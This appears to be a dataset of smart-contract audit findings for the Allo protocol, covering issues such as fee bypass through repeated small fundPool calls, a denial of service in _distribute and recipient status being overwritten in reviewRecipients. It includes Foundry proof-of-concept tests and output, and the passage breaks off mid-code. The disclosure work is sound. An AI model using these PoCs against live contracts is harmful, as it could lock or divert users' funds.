There is nothing stopping the user from funding his pool by invoking the `fundPool` with such a small amount as many times as he needs to fund the pool with whatever amount he chooses, circumventing the fee.\\nEspecially with the low gas fees on L2s on which the protocol will be deployed, this will be a viable method to fund a pool without paying any fee to the protocol.чAdd a `minFundAmount` variable and check for it when funding a pool.чThe protocol doesn't collect fees from pools with low decimal tokens.ч```\\nfunction _fundPool(uint256 _amount, uint256 _poolId, IStrategy _strategy) internal {\\n uint256 feeAmount;\\n uint256 amountAfterFee = _amount;\\n\\n Pool storage pool = pools[_poolId];\\n address _token = pool.token;\\n\\n if (percentFee > 0) {\\n feeAmount = (_amount * percentFee) / getFeeDenominator();\\n amountAfterFee -= feeAmount;\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: treasury, amount: feeAmount}));\\n }\\n\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n\\n emit PoolFunded(_poolId, amountAfterFee, feeAmount);\\n }\\n```\\n -The `RFPSimpleStrategy._registerRecipient()` does not work when the strategy was created using the `useRegistryAnchor=true` causing that nobody can register to the poolчmediumчThe `RFPSimpleStrategy` strategies can be created using the `useRegistryAnchor` which indicates whether to use the registry anchor or not. If the pool is created using the `useRegistryAnchor=true` the RFPSimpleStrategy._registerRecipient() will be reverted by RECIPIENT_ERROR. 
The problem is that when `useRegistryAnchor` is true, the variable recipientAddress is not collected so the function will revert by the RECIPIENT_ERROR.\\nI created a test where the strategy is created using the `userRegistryAnchor=true` then the `registerRecipient()` will be reverted by the `RECIPIENT_ERROR`.\\n```\\n// File: test/foundry/strategies/RFPSimpleStrategy.t.sol:RFPSimpleStrategyTest\\n// $ forge test --match-test \"test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue\" -vvv\\n//\\n function test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue() public {\\n // The registerRecipient() function does not work then the strategy was created using the\\n // useRegistryAnchor = true.\\n //\\n bool useRegistryAnchorTrue = true;\\n RFPSimpleStrategy custom_strategy = new RFPSimpleStrategy(address(allo()), \"RFPSimpleStrategy\");\\n\\n vm.prank(pool_admin());\\n poolId = allo().createPoolWithCustomStrategy(\\n poolProfile_id(),\\n address(custom_strategy),\\n abi.encode(maxBid, useRegistryAnchorTrue, metadataRequired),\\n NATIVE,\\n 0,\\n poolMetadata,\\n pool_managers()\\n );\\n //\\n // Create profile1 metadata and anchor\\n Metadata memory metadata = Metadata({protocol: 1, pointer: \"metadata\"});\\n address anchor = profile1_anchor();\\n bytes memory data = abi.encode(anchor, 1e18, metadata);\\n //\\n // Profile1 member registers to the pool but it reverted by RECIPIENT_ERROR\\n vm.startPrank(address(profile1_member1()));\\n vm.expectRevert(abi.encodeWithSelector(RECIPIENT_ERROR.selector, address(anchor)));\\n allo().registerRecipient(poolId, data);\\n }\\n```\\nчWhen the strategy is using `useRegistryAncho=true`, get the `recipientAddress` from the data:\\n```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActivePool\\n returns (address recipientId)\\n {\\n bool isUsingRegistryAnchor;\\n address recipientAddress;\\n address registryAnchor;\\n uint256 proposalBid;\\n Metadata 
memory metadata;\\n\\n // Decode '_data' depending on the 'useRegistryAnchor' flag\\n if (useRegistryAnchor) {\\n /// @custom:data when 'true' // Remove the line below\\n> (address recipientId, uint256 proposalBid, Metadata metadata)\\n// Remove the line below\\n// Remove the line below\\n (recipientId, proposalBid, metadata) = abi.decode(_data, (address, uint256, Metadata));\\n// Add the line below\\n// Add the line below\\n (recipientId, recipientAddress, proposalBid, metadata) = abi.decode(_data, (address, address, uint256, Metadata));\\n\\n // If the sender is not a profile member this will revert\\n if (!_isProfileMember(recipientId, _sender)) revert UNAUTHORIZED();\\n```\\nчThe pool created with a strategy using the `userRegistryAnchor=true` can not get `registrants` because `_registerRecipient()` will be reverted all the time. If the pool is funded but no one can be allocated since there is not registered recipients, the deposited funds by others may be trapped because those are not distributed since there are not `registrants`.ч```\\n// File: test/foundry/strategies/RFPSimpleStrategy.t.sol:RFPSimpleStrategyTest\\n// $ forge test --match-test \"test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue\" -vvv\\n//\\n function test_registrationIsBlockedWhenThePoolIsCreatedWithUseRegistryIsTrue() public {\\n // The registerRecipient() function does not work then the strategy was created using the\\n // useRegistryAnchor = true.\\n //\\n bool useRegistryAnchorTrue = true;\\n RFPSimpleStrategy custom_strategy = new RFPSimpleStrategy(address(allo()), \"RFPSimpleStrategy\");\\n\\n vm.prank(pool_admin());\\n poolId = allo().createPoolWithCustomStrategy(\\n poolProfile_id(),\\n address(custom_strategy),\\n abi.encode(maxBid, useRegistryAnchorTrue, metadataRequired),\\n NATIVE,\\n 0,\\n poolMetadata,\\n pool_managers()\\n );\\n //\\n // Create profile1 metadata and anchor\\n Metadata memory metadata = Metadata({protocol: 1, pointer: \"metadata\"});\\n 
address anchor = profile1_anchor();\\n bytes memory data = abi.encode(anchor, 1e18, metadata);\\n //\\n // Profile1 member registers to the pool but it reverted by RECIPIENT_ERROR\\n vm.startPrank(address(profile1_member1()));\\n vm.expectRevert(abi.encodeWithSelector(RECIPIENT_ERROR.selector, address(anchor)));\\n allo().registerRecipient(poolId, data);\\n }\\n```\\n -`_distribute()` function in RFPSimpleStrategy contract has wrong requirement causing DOSчmediumчThe function _distribute():\\n```\\n function _distribute(address[] memory, bytes memory, address _sender)\\n internal\\n virtual\\n override\\n onlyInactivePool\\n onlyPoolManager(_sender)\\n {\\n // rest of code\\n\\n IAllo.Pool memory pool = allo.getPool(poolId);\\n Milestone storage milestone = milestones[upcomingMilestone];\\n Recipient memory recipient = _recipients[acceptedRecipientId];\\n\\n if (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n\\n uint256 amount = (recipient.proposalBid * milestone.amountPercentage) / 1e18;\\n\\n poolAmount -= amount;//<@@ NOTICE the poolAmount get decrease over time\\n\\n _transferAmount(pool.token, recipient.recipientAddress, amount);\\n\\n // rest of code\\n }\\n```\\n\\nLet's suppose this scenario:\\nPool manager funding the contract with 100 token, making `poolAmount` variable equal to 100\\nPool manager set 5 equal milestones with 20% each\\nSelected recipient's proposal bid is 100, making `recipients[acceptedRecipientId].proposalBid` variable equal to 100\\nAfter milestone 1 done, pool manager pays recipient using `distribute()`. 
Value of variables after: `poolAmount = 80 ,recipients[acceptedRecipientId].proposalBid = 100`\\nAfter milestone 2 done, pool manager will get DOS trying to pay recipient using `distribute()` because of this line:\\n```\\nif (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n```\\nч```\\n- if (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n+ if ((recipient.proposalBid * milestone.amountPercentage) / 1e18 > poolAmount) revert NOT_ENOUGH_FUNDS();\\n```\\nчThis behaviour will cause DOS when distributing the 2nd milestone or higherч```\\n function _distribute(address[] memory, bytes memory, address _sender)\\n internal\\n virtual\\n override\\n onlyInactivePool\\n onlyPoolManager(_sender)\\n {\\n // rest of code\\n\\n IAllo.Pool memory pool = allo.getPool(poolId);\\n Milestone storage milestone = milestones[upcomingMilestone];\\n Recipient memory recipient = _recipients[acceptedRecipientId];\\n\\n if (recipient.proposalBid > poolAmount) revert NOT_ENOUGH_FUNDS();\\n\\n uint256 amount = (recipient.proposalBid * milestone.amountPercentage) / 1e18;\\n\\n poolAmount -= amount;//<@@ NOTICE the poolAmount get decrease over time\\n\\n _transferAmount(pool.token, recipient.recipientAddress, amount);\\n\\n // rest of code\\n }\\n```\\n -`QVBaseStrategy::reviewRecipients()` doesn't check if the recipient is already accepted or rejected, and overwrites the current statusчmediumчIn the QV strategy contracts, recipients register themselves and wait for a pool manager to accept the registration. Pool managers can accept or reject recipients with the `reviewRecipients()` function. There is also a threshold (reviewThreshold) for recipients to be accepted. For example, if the `reviewThreshold` is 2, a pending recipient gets accepted when two managers accept this recipient and the `recipientStatus` is updated.\\nHowever, `QVBaseStrategy::reviewRecipients()` function doesn't check the recipient's current status. 
This one alone may not be an issue because managers may want to change the status of the recipient etc.\\nBut on top of that, the function also doesn't take the previous review counts into account when updating the status, and overwrites the status immediately after reaching the threshold. I'll share a scenario later about this below.\\n```\\nfile: QVBaseStrategy.sol\\n function reviewRecipients(address[] calldata _recipientIds, Status[] calldata _recipientStatuses)\\n external\\n virtual\\n onlyPoolManager(msg.sender)\\n onlyActiveRegistration\\n {\\n // make sure the arrays are the same length\\n uint256 recipientLength = _recipientIds.length;\\n if (recipientLength != _recipientStatuses.length) revert INVALID();\\n\\n for (uint256 i; i < recipientLength;) {\\n Status recipientStatus = _recipientStatuses[i];\\n address recipientId = _recipientIds[i];\\n\\n // if the status is none or appealed then revert\\n if (recipientStatus == Status.None || recipientStatus == Status.Appealed) { //@audit these are the input parameter statuse not the recipient's status.\\n revert RECIPIENT_ERROR(recipientId);\\n }\\n\\n reviewsByStatus[recipientId][recipientStatus]++;\\n\\n --> if (reviewsByStatus[recipientId][recipientStatus] >= reviewThreshold) { //@audit recipientStatus is updated right after the threshold is reached. It can overwrite if the status is already set.\\n Recipient storage recipient = recipients[recipientId];\\n recipient.recipientStatus = recipientStatus;\\n\\n emit RecipientStatusUpdated(recipientId, recipientStatus, address(0));\\n }\\n\\n emit Reviewed(recipientId, recipientStatus, msg.sender);\\n\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n\\nAs I mentioned above, the function updates the `recipientStatus` immediately after reaching the threshold. 
Here is a scenario of why this might be an issue.\\nExample Scenario\\nThe pool has 5 managers and the `reviewThreshold` is 2.\\nThe first manager rejects the recipient\\nThe second manager accepts the recipient\\nThe third manager rejects the recipient. -> `recipientStatus` updated -> `status = REJECTED`\\nThe fourth manager rejects the recipient -> status still `REJECTED`\\nThe last manager accepts the recipient ->recipientStatus updated again -> `status = ACCEPTED`\\n3 managers rejected and 2 managers accepted the recipient but the recipient status is overwritten without checking the recipient's previous status and is ACCEPTED now.\\nCoded PoC\\nYou can prove the scenario above with the PoC. You can use the protocol's own setup for this.\\n- Copy the snippet below and paste it into the `QVBaseStrategy.t.sol` test file.\\n- Run forge test `--match-test test_reviewRecipient_reviewTreshold_OverwriteTheLastOne`\\n```\\n//@audit More managers rejected but the recipient is accepted\\n function test_reviewRecipient_reviewTreshold_OverwriteTheLastOne() public virtual {\\n address recipientId = __register_recipient();\\n\\n // Create rejection status\\n address[] memory recipientIds = new address[](1);\\n recipientIds[0] = recipientId;\\n IStrategy.Status[] memory Statuses = new IStrategy.Status[](1);\\n Statuses[0] = IStrategy.Status.Rejected;\\n\\n // Reject three times with different managers\\n vm.startPrank(pool_manager1());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n vm.startPrank(pool_manager2());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n vm.startPrank(pool_manager3());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n // Three managers rejected. 
Status will be rejected.\\n assertEq(uint8(qvStrategy().getRecipientStatus(recipientId)), uint8(IStrategy.Status.Rejected));\\n assertEq(qvStrategy().reviewsByStatus(recipientId, IStrategy.Status.Rejected), 3);\\n\\n // Accept two times after three rejections\\n Statuses[0] = IStrategy.Status.Accepted;\\n vm.startPrank(pool_admin());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n vm.startPrank(pool_manager4());\\n qvStrategy().reviewRecipients(recipientIds, Statuses);\\n\\n // 3 Rejected, 2 Accepted, but status is Accepted because it overwrites right after passing threshold.\\n assertEq(uint8(qvStrategy().getRecipientStatus(recipientId)), uint8(IStrategy.Status.Accepted));\\n assertEq(qvStrategy().reviewsByStatus(recipientId, IStrategy.Status.Rejected), 3);\\n assertEq(qvStrategy().reviewsByStatus(recipientId, IStrategy.Status.Accepted), 2);\\n }\\n```\\n\\nYou can find the test results below:\\n```\\nRunning 1 test for test/foundry/strategies/QVSimpleStrategy.t.sol:QVSimpleStrategyTest\\n[PASS] test_reviewRecipient_reviewTreshold_OverwriteTheLastOne() (gas: 249604)\\nTest result: ok. 
1 passed; 0 failed; 0 skipped; finished in 10.92ms\\n```\\nчChecking the review counts before updating the state might be helpful to mitigate this issueчRecipient status might be overwritten with less review counts.ч```\\nfile: QVBaseStrategy.sol\\n function reviewRecipients(address[] calldata _recipientIds, Status[] calldata _recipientStatuses)\\n external\\n virtual\\n onlyPoolManager(msg.sender)\\n onlyActiveRegistration\\n {\\n // make sure the arrays are the same length\\n uint256 recipientLength = _recipientIds.length;\\n if (recipientLength != _recipientStatuses.length) revert INVALID();\\n\\n for (uint256 i; i < recipientLength;) {\\n Status recipientStatus = _recipientStatuses[i];\\n address recipientId = _recipientIds[i];\\n\\n // if the status is none or appealed then revert\\n if (recipientStatus == Status.None || recipientStatus == Status.Appealed) { //@audit these are the input parameter statuse not the recipient's status.\\n revert RECIPIENT_ERROR(recipientId);\\n }\\n\\n reviewsByStatus[recipientId][recipientStatus]++;\\n\\n --> if (reviewsByStatus[recipientId][recipientStatus] >= reviewThreshold) { //@audit recipientStatus is updated right after the threshold is reached. 
It can overwrite if the status is already set.\\n Recipient storage recipient = recipients[recipientId];\\n recipient.recipientStatus = recipientStatus;\\n\\n emit RecipientStatusUpdated(recipientId, recipientStatus, address(0));\\n }\\n\\n emit Reviewed(recipientId, recipientStatus, msg.sender);\\n\\n unchecked {\\n ++i;\\n }\\n }\\n }\\n```\\n -CREATE3 is not available in the zkSync Era.чmediumчThe zkSync Era docs explain how it differs from Ethereum.\\nPOC:\\n```\\n// SPDX-License-Identifier: Unlicensed\\npragma solidity ^0.8.0;\\n\\nimport \"./MiniContract.sol\";\\nimport \"./CREATE3.sol\";\\n\\ncontract DeployTest {\\n address public deployedAddress;\\n event Deployed(address);\\n \\n function generateContract() public returns(address, address) {\\n bytes32 salt = keccak256(\"SALT\");\\n\\n address preCalculatedAddress = CREATE3.getDeployed(salt);\\n\\n // check if the contract has already been deployed by checking code size of address\\n bytes memory creationCode = abi.encodePacked(type(MiniContract).creationCode, abi.encode(777));\\n\\n // Use CREATE3 to deploy the anchor contract\\n address deployed = CREATE3.deploy(salt, creationCode, 0);\\n return (preCalculatedAddress, deployed);\\n }\\n}\\n```\\n\\nAlso, the logic to compute the address of Create2 is different from Ethereum, as shown below, so the CREATE3 library cannot be used as it is.\\nThis cause registry returns an incorrect `preCalculatedAddress`, causing the anchor to be registered to an address that is not the actual deployed address.\\n```\\naddress ⇒ keccak256( \\n keccak256(\"zksyncCreate2\") ⇒ 0x2020dba91b30cc0006188af794c2fb30dd8520db7e2c088b7fc7c103c00ca494, \\n sender, \\n salt, \\n keccak256(bytecode), \\n keccak256(constructorInput)\\n ) \\n```\\nчThis can be solved by implementing CREATE2 directly instead of CREATE3 and using `type(Anchor).creationCode`. 
Also, the compute address logic needs to be modified for zkSync.ч`generateAnchor` doesn't work, so user can't do anything related to anchor.ч```\\n// SPDX-License-Identifier: Unlicensed\\npragma solidity ^0.8.0;\\n\\nimport \"./MiniContract.sol\";\\nimport \"./CREATE3.sol\";\\n\\ncontract DeployTest {\\n address public deployedAddress;\\n event Deployed(address);\\n \\n function generateContract() public returns(address, address) {\\n bytes32 salt = keccak256(\"SALT\");\\n\\n address preCalculatedAddress = CREATE3.getDeployed(salt);\\n\\n // check if the contract has already been deployed by checking code size of address\\n bytes memory creationCode = abi.encodePacked(type(MiniContract).creationCode, abi.encode(777));\\n\\n // Use CREATE3 to deploy the anchor contract\\n address deployed = CREATE3.deploy(salt, creationCode, 0);\\n return (preCalculatedAddress, deployed);\\n }\\n}\\n```\\n -Anchor contract is unable to receive NFTs of any kindчmediumчAnchor.sol essentially works like a wallet, and is also attached to a profile to give it extra credibility and the profile owner more functionality.\\nAs intended, this contract will receive NFTs from different strategies and protocols. However, as it is currently implemented these contracts will not be able to receive NFTs sent with safeTransferFrom(), because they do not implement the necessary functions to safely receive these tokens.\\nWhile in many cases such a situation would be Medium severity, looking at how these wallets will be used, this could lead to more serious consequences. 
For example, having an anchor that is entitled to high value NFTs but is not able to receive them is clearly a loss of funds risk, and a High severity issue.\\nimplement the onERC721Received() and onERC1155Received() functions in following code:\\n```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.19;\\n\\n// Core Contracts\\nimport {Registry} from \"./Registry.sol\";\\n\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⢿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⡟⠘⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣾⣿⣿⣿⣿⣾⠻⣿⣿⣿⣿⣿⣿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⡿⠀⠀⠸⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⢀⣠⣴⣴⣶⣶⣶⣦⣦⣀⡀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⣿⣿⣿⣿⡿⠃⠀⠙⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠁⠀⠀⠀⢻⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠘⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⠃⠀⠀⠀⠀⠈⢿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⣰⣿⣿⣿⡿⠋⠁⠀⠀⠈⠘⠹⣿⣿⣿⣿⣆⠀⠀⠀\\n// ⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⡿⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⡀⠀⠀\\n// ⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣟⠀⡀⢀⠀⡀⢀⠀⡀⢈⢿⡟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⡇⠀⠀\\n// ⠀⠀⣠⣿⣿⣿⣿⣿⣿⡿⠋⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⡿⢿⠿⠿⠿⠿⠿⠿⠿⠿⠿⢿⣿⣿⣿⣷⡀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠸⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⠂⠀⠀\\n// ⠀⠀⠙⠛⠿⠻⠻⠛⠉⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣿⣿⣧⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⢻⣿⣿⣿⣷⣀⢀⠀⠀⠀⡀⣰⣾⣿⣿⣿⠏⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⢰⣿⣿⣿⣿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣧⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠹⢿⣿⣿⣿⣿⣾⣾⣷⣿⣿⣿⣿⡿⠋⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠙⠋⠛⠙⠋⠛⠙⠋⠛⠙⠋⠃⠀⠀⠀⠀⠀⠀⠀⠀⠠⠿⠻⠟⠿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⠟⠿⠟⠿⠆⠀⠸⠿⠿⠟⠯⠀⠀⠀⠸⠿⠿⠿⠏⠀⠀⠀⠀⠀⠈⠉⠻⠻⡿⣿⢿⡿⡿⠿⠛⠁⠀⠀⠀⠀⠀⠀\\n// allo.gitcoin.co\\n\\n/// @title Anchor contract\\n/// @author @thelostone-mc , @0xKurt , @codenamejason , @0xZakk , @nfrgosselin \\n/// @notice Anchors are associated with profiles and are accessible exclusively by the 
profile owner. This contract ensures secure\\n/// and authorized interaction with external addresses, enhancing the capabilities of profiles and enabling controlled\\n/// execution of operations. The contract leverages the `Registry` contract for ownership verification and access control.\\ncontract Anchor {\\n /// ==========================\\n /// === Storage Variables ====\\n /// ==========================\\n\\n /// @notice The registry contract on any given network/chain\\n Registry public immutable registry;\\n\\n /// @notice The profileId of the allowed profile to execute calls\\n bytes32 public immutable profileId;\\n\\n /// ==========================\\n /// ======== Errors ==========\\n /// ==========================\\n\\n /// @notice Throws when the caller is not the owner of the profile\\n error UNAUTHORIZED();\\n\\n /// @notice Throws when the call to the target address fails\\n error CALL_FAILED();\\n\\n /// ==========================\\n /// ======= Constructor ======\\n /// ==========================\\n\\n /// @notice Constructor\\n /// @dev We create an instance of the 'Registry' contract using the 'msg.sender' and set the profileId.\\n /// @param _profileId The ID of the allowed profile to execute calls\\n constructor(bytes32 _profileId) {\\n registry = Registry(msg.sender);\\n profileId = _profileId;\\n }\\n\\n /// ==========================\\n /// ======== External ========\\n /// ==========================\\n\\n /// @notice Execute a call to a target address\\n /// @dev 'msg.sender' must be profile owner\\n /// @param _target The target address to call\\n /// @param _value The amount of native token to send\\n /// @param _data The data to send to the target address\\n /// @return Data returned from the target address\\n function execute(address _target, uint256 _value, bytes memory _data) external returns (bytes memory) {\\n // Check if the caller is the owner of the profile and revert if not\\n if (!registry.isOwnerOfProfile(profileId, 
msg.sender)) revert UNAUTHORIZED();\\n\\n // Check if the target address is the zero address and revert if it is\\n if (_target == address(0)) revert CALL_FAILED();\\n\\n // Call the target address and return the data\\n (bool success, bytes memory data) = _target.call{value: _value}(_data);\\n\\n // Check if the call was successful and revert if not\\n if (!success) revert CALL_FAILED();\\n\\n return data;\\n }\\n\\n /// @notice This contract should be able to receive native token\\n receive() external payable {}\\n}\\n```\\nчimplement the onERC721Received() and onERC1155Received() functionsчAny time an ERC721 or ERC1155 is attempted to be transferred with safeTransferFrom() or minted with safeMint(), the call will fail.ч```\\n// SPDX-License-Identifier: AGPL-3.0-only\\npragma solidity 0.8.19;\\n\\n// Core Contracts\\nimport {Registry} from \"./Registry.sol\";\\n\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⣿⢿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿⡟⠘⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\\n// ⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣾⣿⣿⣿⣿⣾⠻⣿⣿⣿⣿⣿⣿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⡿⠀⠀⠸⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣗⠀⠀⠀⢸⣿⣿⣿⡯⠀⠀⠀⠀⠀⠀⢀⣠⣴⣴⣶⣶⣶⣦⣦⣀⡀⠀⠀⠀⠀⠀⠀\\n// 